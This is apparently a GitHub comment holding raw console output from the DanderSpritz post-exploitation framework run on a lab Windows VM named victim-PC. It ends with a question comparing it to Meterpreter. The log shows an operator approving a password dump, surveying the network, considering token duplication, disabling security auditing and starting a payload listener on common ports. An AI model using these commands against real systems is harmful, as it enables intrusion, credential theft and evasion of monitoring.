| | SERVICE | %%%%windir%%%%\system32\lpremove.exe (runs in "") | BOOT | BOOT | SYSTEM HIGHEST | MUI\LPRemove | | |
| | SERVICE | COM job ClassID and data: {2DEA658F-54C1-4227-AF9B-260AB5FC3543} - | LOGON | LOGON | LEAST | Multimedia\SystemSoundsService | | |
| | SERVICE | %%%%windir%%%%\system32\gatherNetworkInfo.vbs (runs in "$(Arg1)") | | | HIGHEST | NetTrace\GatherNetworkInfo | | |
| | SERVICE | %%%%SystemRoot%%%%\System32\powercfg.exe -energy -auto (runs in "") | DAILY 2008-01-01T06:00:00 | DAILY 2008-01-01T06:00:00 | SYSTEM LEAST | Power Efficiency Diagnostics\AnalyzeSystem | | |
| | SERVICE | COM job ClassID and data: {42060D27-CA53-41F5-96E4-B1E8169308A6} - $(Arg0) | EVENT , TIME 2008-03-31T00:00:00Z | EVENT , TIME 2008-03-31T00:00:00Z | LOCAL SERVICE LEAST | RAC\RacTask | | |
| | SERVICE | COM job ClassID and data: {C463A0FC-794F-4FDF-9201-01938CEACAFA} - | EVENT | EVENT | LOCAL SERVICE LEAST | Ras\MobilityManager | | |
| | SERVICE | COM job ClassID and data: {CA767AA8-9157-4604-B64B-40747123D5F2} - | DAILY 2008-01-01T00:00:00 | DAILY 2008-01-01T00:00:00 | SYSTEM LEAST | Registry\RegIdleBackup | | |
| | SERVICE | %%%%windir%%%%\system32\RAServer.exe /offerraupdate (runs in "%%%%windir%%%%") | EVENT , REGISTRATION | EVENT , REGISTRATION | SYSTEM HIGHEST | RemoteAssistance\RemoteAssistanceTask | | |
| | SERVICE | COM job ClassID and data: {FF87090D-4A9A-4F47-879B-29A80C355D61} - $(Arg0) | LOGON | LOGON | LEAST | SideShow\GadgetManager | | |
| | SERVICE | %%%%windir%%%%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation (runs in "") | DAILY 2005-06-14T00:00:00 , BOOT | DAILY 2005-06-14T00:00:00 , BOOT | SYSTEM LEAST | SystemRestore\SR | | |
| | SERVICE | COM job ClassID and data: {855FEC53-D2E4-4999-9E87-3414E9CF0FF4} - $(Arg0) | | | LEAST | Task Manager\Interactive | | |
| | SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (runs in "") | EVENT | EVENT | HIGHEST | Tcpip\IpAddressConflict1 | | |
| | SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (runs in "") | EVENT 2006-02-23T16:27:43 | EVENT 2006-02-23T16:27:43 | HIGHEST | Tcpip\IpAddressConflict2 | | |
| | SERVICE | COM job ClassID and data: {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} - | LOGON | LOGON | LEAST | TextServicesFramework\MsCtfMonitor | | |
| | SERVICE | %%%%windir%%%%\system32\sc.exe start w32time task_started (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | LOCAL SERVICE HIGHEST | Time Synchronization\SynchronizeTime | | |
| | SERVICE | sc.exe config upnphost start= auto (runs in "") | | | SYSTEM LEAST | UPnP\UPnPHostConfig | | |
| | SERVICE | COM job ClassID and data: {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1} - | | | HIGHEST | WDI\ResolutionHost | | |
| | SERVICE | %%%%windir%%%%\system32\wermgr.exe -queuereporting (runs in "") | LOGON | LOGON | LEAST | Windows Error Reporting\QueueReporting | | |
| | SERVICE | %%%%windir%%%%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange (runs in "") | EVENT | EVENT | SYSTEM LEAST | Windows Filtering Platform\BfeOnServiceStartTypeChange | | |
| | SERVICE | "%%%%ProgramFiles%%%%\Windows Media Player\wmpnscfg.exe" (runs in "") | EVENT | EVENT | LEAST | Windows Media Sharing\UpdateLibrary | | |
| | SERVICE | %%%%systemroot%%%%\System32\sdclt.exe /CONFIGNOTIFICATION (runs in "") | DAILY 2010-11-27T10:00:00 | DAILY 2010-11-27T10:00:00 | LOCAL SERVICE LEAST | WindowsBackup\ConfigNotification | | |
| | SERVICE | c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan (runs in "") | DAILY 2000-01-01T04:09:42 2100-01-01T00:00:00 | DAILY 2000-01-01T04:09:42 2100-01-01T00:00:00 | SYSTEM HIGHEST | Windows Defender\MP Scheduled Scan | | |
| - [2017-04-15 16:02:34 z0.0.0.13] =============================== Persistence checks =============================================================== | |
| - | Path/Key | File/Value | Data | | |
| - +------------------------------------------------------------+---------------+------------------------------------------+ | |
| - | system\currentcontrolset\Services\tcpip\Parameters\Winsock | HelperDllName | %%%%SystemRoot%%%%\System32\wshtcpip.dll | | |
| - | Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_Dlls | | | |
| - | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Shell | explorer.exe | | |
| - | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Userinit | C:\Windows\system32\userinit.exe, | | |
| - [2017-04-15 16:02:36 z0.0.0.13] Saved safety handlers for future op(s) | |
| - [2017-04-15 16:02:37 z0.0.0.13] ================================== Password dump ================================================================== | |
| - [2017-04-15 16:02:37 z0.0.0.13] 1 safety handler registered for passworddump | |
| I think it's safe to run passworddump. Do you want to run it? | |
| YES | |
| - [2017-04-15 16:02:52 z0.0.0.13] ================================= OS information ================================================================= | |
| - [2017-04-15 16:02:52 z0.0.0.13] Data age: 24:44 (from local cache, re-run manually if you need to) | |
| - OS installed on Sat Apr 15 00:34:19 2017 | |
| - System language settings | |
| Locale: English (USA) | |
| Installed: English (USA) | |
| UI: English (USA) | |
| OS: English (USA) | |
| - System version information | |
| Version: 6.1.1.0 Build 7601 winnt i386 Service Pack 1 | |
| - [2017-04-15 16:02:53 z0.0.0.13] ============================= Networking Information ============================================================= | |
| FQDN: victim-PC | |
| DNS Servers: 195.130.131.1, 195.130.130.1 | |
| - [2017-04-15 16:02:53 z0.0.0.13] Showing all non-local and non-tunnel encapsulation adapter information, see command 1206 for full interface list | |
| | Description | MAC | IP | Netmask | Gateway | DHCP Server | Name | | |
| +--------------------------------------+-------------------+---------------+---------------+---------------------------------+-------------+----------------------------------------------------------------+ | |
| | Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-BB-EF-C8 | 192.168.0.249 | 255.255.255.0 | fe80::de53:7cff:fef2:b96e%%%%11 | 192.168.0.1 | Local Area Connection ({C63B0135-2C21-412E-92E7-A6FEB149081E}) | | |
| - ------------------------------------------------------------------- Route table ------------------------------------------------------------------- | |
| - [2017-04-15 16:02:53 z0.0.0.13] Data age: 24:43 (from local cache, re-run manually if you need to) | |
| | Dest. network | Mask | Gateway | Interface | Metric | Origin | | |
| +-----------------------------------------+-----------------+---------------------------+---------------+--------+-----------+ | |
| | 0.0.0.0 | 0.0.0.0 | 192.168.0.1 | 192.168.0.249 | 10 | MANUAL | | |
| | 127.0.0.0 | 255.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL | | |
| | 127.0.0.1 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL | | |
| | 127.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL | | |
| | 192.168.0.0 | 255.255.255.0 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL | | |
| | 192.168.0.249 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL | | |
| | 192.168.0.255 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL | | |
| | 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | WELLKNOWN | | |
| | 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 192.168.0.249 | 266 | WELLKNOWN | | |
| | 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL | | |
| | 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 192.168.0.249 | 266 | MANUAL | | |
| | :: | 0 | fe80::de53:7cff:fef2:b96e | 192.168.0.249 | 26 | ROUTER_AD | | |
| | ::1 | 128 | :: | 127.0.0.1 | 306 | MANUAL | | |
| | 2001:: | 32 | :: | | 8 | ROUTER_AD | | |
| | 2001:0:9d38:6abd:488:1cb2:ae5b:d867 | 128 | :: | | 256 | MANUAL | | |
| | 2a02:1811:241e:5c00:: | 64 | :: | 192.168.0.249 | 18 | ROUTER_AD | | |
| | 2a02:1811:241e:5c00:: | 64 | fe80::de53:7cff:fef2:b96e | 192.168.0.249 | 266 | ROUTER_AD | | |
| | 2a02:1811:241e:5c00:301a:5a76:66cf:2906 | 128 | :: | 192.168.0.249 | 266 | MANUAL | | |
| | 2a02:1811:241e:5c00:4862:ad35:9a1d:cbc | 128 | :: | 192.168.0.249 | 266 | MANUAL | | |
| | fe80:: | 64 | :: | 192.168.0.249 | 266 | MANUAL | | |
| | fe80:: | 64 | :: | | 256 | MANUAL | | |
| | fe80::5efe:c0a8:f9 | 128 | :: | | 256 | MANUAL | | |
| | fe80::488:1cb2:ae5b:d867 | 128 | :: | | 256 | MANUAL | | |
| | fe80::301a:5a76:66cf:2906 | 128 | :: | 192.168.0.249 | 266 | MANUAL | | |
| | ff00:: | 8 | :: | 127.0.0.1 | 306 | WELLKNOWN | | |
| | ff00:: | 8 | :: | | 256 | WELLKNOWN | | |
| | ff00:: | 8 | :: | 192.168.0.249 | 266 | WELLKNOWN | | |
| - -------------------------------------------------------------------- ARP table -------------------------------------------------------------------- | |
| - [2017-04-15 16:02:53 z0.0.0.13] Data age: 24:42 (from local cache, re-run manually if you need to) | |
| | IP | Type | Interface | MAC | | |
| +-------------------------------------+------+---------------+-------------------------------------------+ | |
| | 224.0.0.22 | | 127.0.0.1 | | | |
| | 239.255.255.250 | | 127.0.0.1 | | | |
| | 192.168.0.1 | | 192.168.0.249 | DC-53-7C-F2-B9-6E | | |
| | 192.168.0.114 | | 192.168.0.249 | 5C-E0-C5-5A-05-5F | | |
| | 192.168.0.118 | | 192.168.0.249 | 08-00-27-A0-13-50 | | |
| | 192.168.0.255 | | 192.168.0.249 | FF-FF-FF-FF-FF-FF | | |
| | 224.0.0.22 | | 192.168.0.249 | 01-00-5E-00-00-16 | | |
| | 224.0.0.252 | | 192.168.0.249 | 01-00-5E-00-00-FC | | |
| | 224.0.0.253 | | 192.168.0.249 | 01-00-5E-00-00-FD | | |
| | 239.255.255.250 | | 192.168.0.249 | 01-00-5E-7F-FF-FA | | |
| | 255.255.255.255 | | 192.168.0.249 | FF-FF-FF-FF-FF-FF | | |
| | ff02::c | | 127.0.0.1 | | | |
| | ff02::16 | | 127.0.0.1 | | | |
| | ff02::1:2 | | 127.0.0.1 | | | |
| | 2001:0:9d38:6abd:4af:37e6:ae5b:d867 | | | 00-00-00-00-00-00-04-AF-37-E6-3F-57-FF-89 | | |
| | ff02::2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 | | |
| | ff02::16 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 | | |
| | ff02::1:2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 | | |
| | ff02::1:ff5b:d867 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 | | |
| | fe80::ac72:89df:85b6:949b | | 192.168.0.249 | 08-00-27-A0-13-50 | | |
| | fe80::de53:7cff:fef2:b96e | | 192.168.0.249 | DC-53-7C-F2-B9-6E | | |
| | ff02::2 | | 192.168.0.249 | 33-33-00-00-00-02 | | |
| | ff02::c | | 192.168.0.249 | 33-33-00-00-00-0C | | |
| | ff02::16 | | 192.168.0.249 | 33-33-00-00-00-16 | | |
| | ff02::1:2 | | 192.168.0.249 | 33-33-00-01-00-02 | | |
| | ff02::1:3 | | 192.168.0.249 | 33-33-00-01-00-03 | | |
| | ff02::1:ff1d:cbc | | 192.168.0.249 | 33-33-FF-1D-0C-BC | | |
| | ff02::1:ffb6:949b | | 192.168.0.249 | 33-33-FF-B6-94-9B | | |
| | ff02::1:ffcf:2906 | | 192.168.0.249 | 33-33-FF-CF-29-06 | | |
| | ff02::1:fff2:b96e | | 192.168.0.249 | 33-33-FF-F2-B9-6E | | |
| - ----------------------------------------------------- Getting the pipelist in the background ----------------------------------------------------- | |
| - --------------------------------------------------------------------- NETBIOS --------------------------------------------------------------------- | |
| Running command 'netbios ' | |
| --------------------------------------------------------------------- | |
| VICTIM-PC UNIQUE REGISTERED File Server Service | |
| VICTIM-PC UNIQUE REGISTERED Workstation Service | |
| WORKGROUP GROUP REGISTERED Domain Name | |
| WORKGROUP GROUP REGISTERED Browser Service Elections | |
| Adapter Address: 08.00.27.bb.ef.c8 | |
| Adapter Type : Ethernet Adapter | |
| Command completed successfully | |
| Do you want to run background netmap -minimal? | |
| YES | |
| - Netmap will require user credentials (and probably won't work on 2K8) | |
| - If you want to run netmap, you have to go run "duplicatetoken -duplicate" or logonasuser for me | |
| Do you want to do this? | |
| NO | |
| - [2017-04-15 16:03:57 z0.0.0.13] Can't get netmap without creds | |
| - [2017-04-15 16:03:58 z0.0.0.13] ============================ Memory usage information ============================================================ | |
| - [2017-04-15 16:03:58 z0.0.0.13] 1 safety handler registered for memory | |
| - [2017-04-15 16:03:58 z0.0.0.13] Data age: 25:29 (from local cache, re-run manually if you need to) | |
| - Memory Load : 52%% | |
| - Physical Available: 240 M | |
| - Physical Total : 511 M | |
| - [2017-04-15 16:03:59 z0.0.0.13] ============================ Disk list and space info ============================================================ | |
| - [2017-04-15 16:03:59 z0.0.0.13] Data age: 25:28 (from local cache, re-run manually if you need to) | |
| | Drive | Serial | Type | In use (MB) | Change (MB) | | |
| +-------+-----------+-------+--------------------+-------------+ | |
| | C | f008-53db | Fixed | 10473/15256 (68%%) | 0 | | |
| | D | | Cdrom | | | | |
| - [2017-04-15 16:04:00 z0.0.0.13] ================================= USB survey info ================================================================= | |
| - [2017-04-15 16:04:00 z0.0.0.13] System\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} data is only 0:25:25.829000 old, was not re-run | |
| - [2017-04-15 16:04:00 z0.0.0.13] SYSTEM\CurrentControlSet\Enum\USB data is only 0:25:24.881000 old, was not re-run | |
| - [2017-04-15 16:04:00 z0.0.0.13] SYSTEM\CurrentControlSet\Enum\USBSTOR not found | |
| - [2017-04-15 16:04:00 z0.0.0.13] Showing recent USB devices | |
| [2017-04-16 03:50:02] ##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} | |
| [2009-07-14 04:52:51] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&17b13437&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} | |
| [2010-11-20 21:47:52] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&3af2ddc5&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} | |
| - [2017-04-15 16:04:02 z0.0.0.13] User info started in the background as command ID 1371. | |
| - [2017-04-15 16:04:03 z0.0.0.13] Extra info to get started in the background as command ID 1372. | |
| Running command 'python diffhour.py -args "-safe -sysdrive -recursive"' | |
| - [2017-04-15 16:04:06 z0.0.0.13] Recording initial data, running "dir -mask "*" -path C: -age 1h -recursive" | |
| - [2017-04-15 16:04:06 z0.0.0.13] Running dir -path C: -after "2017-04-15 13:04:08" -mask "*" -recursive -before "2017-04-15 14:04:08" | |
| - [2017-04-15 16:04:16 z0.0.0.13] No changes detected | |
| Command completed successfully | |
| - [2017-04-15 16:04:17 z0.0.0.13] Commands currently running in the background: | |
| | ID | Target | Full Command | Sent | Received | | |
| +------+-----------+--------------------------------------------------------------------------------------------------------+------+----------+ | |
| | 1129 | z0.0.0.13 | keepalive -delay 1m | 109 | 0 | | |
| | 1196 | z0.0.0.13 | script Connected/Connected.dss | 0 | 0 | | |
| | 1197 | z0.0.0.13 | python Connected/Connected.py -project Ops | 0 | 0 | | |
| | 1216 | z0.0.0.13 | python survey.py -args " -run " | 0 | 0 | | |
| | 1220 | z0.0.0.13 | background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s "processes -monitor " " | 0 | 0 | | |
| | 1221 | z0.0.0.13 | background log=monitor guiflag=monitor processes -monitor | 236 | 981 | | |
| | 1237 | z0.0.0.13 | stopaliasing dst=z0.0.0.13 audit -disable security | 152 | 14 | | |
| Command completed successfully | |
| Command completed successfully | |
| Command completed successfully | |
| Command completed successfully | |
| [23:04:18] Backgrounded 'pc_listen -key "Default" -payload "Danderspritz" -run "memlib" -tcp "443 80 53 1509" -autoaccept ' Id: 1125 | |
| [23:04:18] ID: 1377 '/Local-Only-Command' started [default target: z0.0.0.13] | |
| * Command '/local-only-command' not found | |
| *** Command indicated failure *** | 
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment
  
            
does danderspritz have any interesting commands like in meterpreter shell?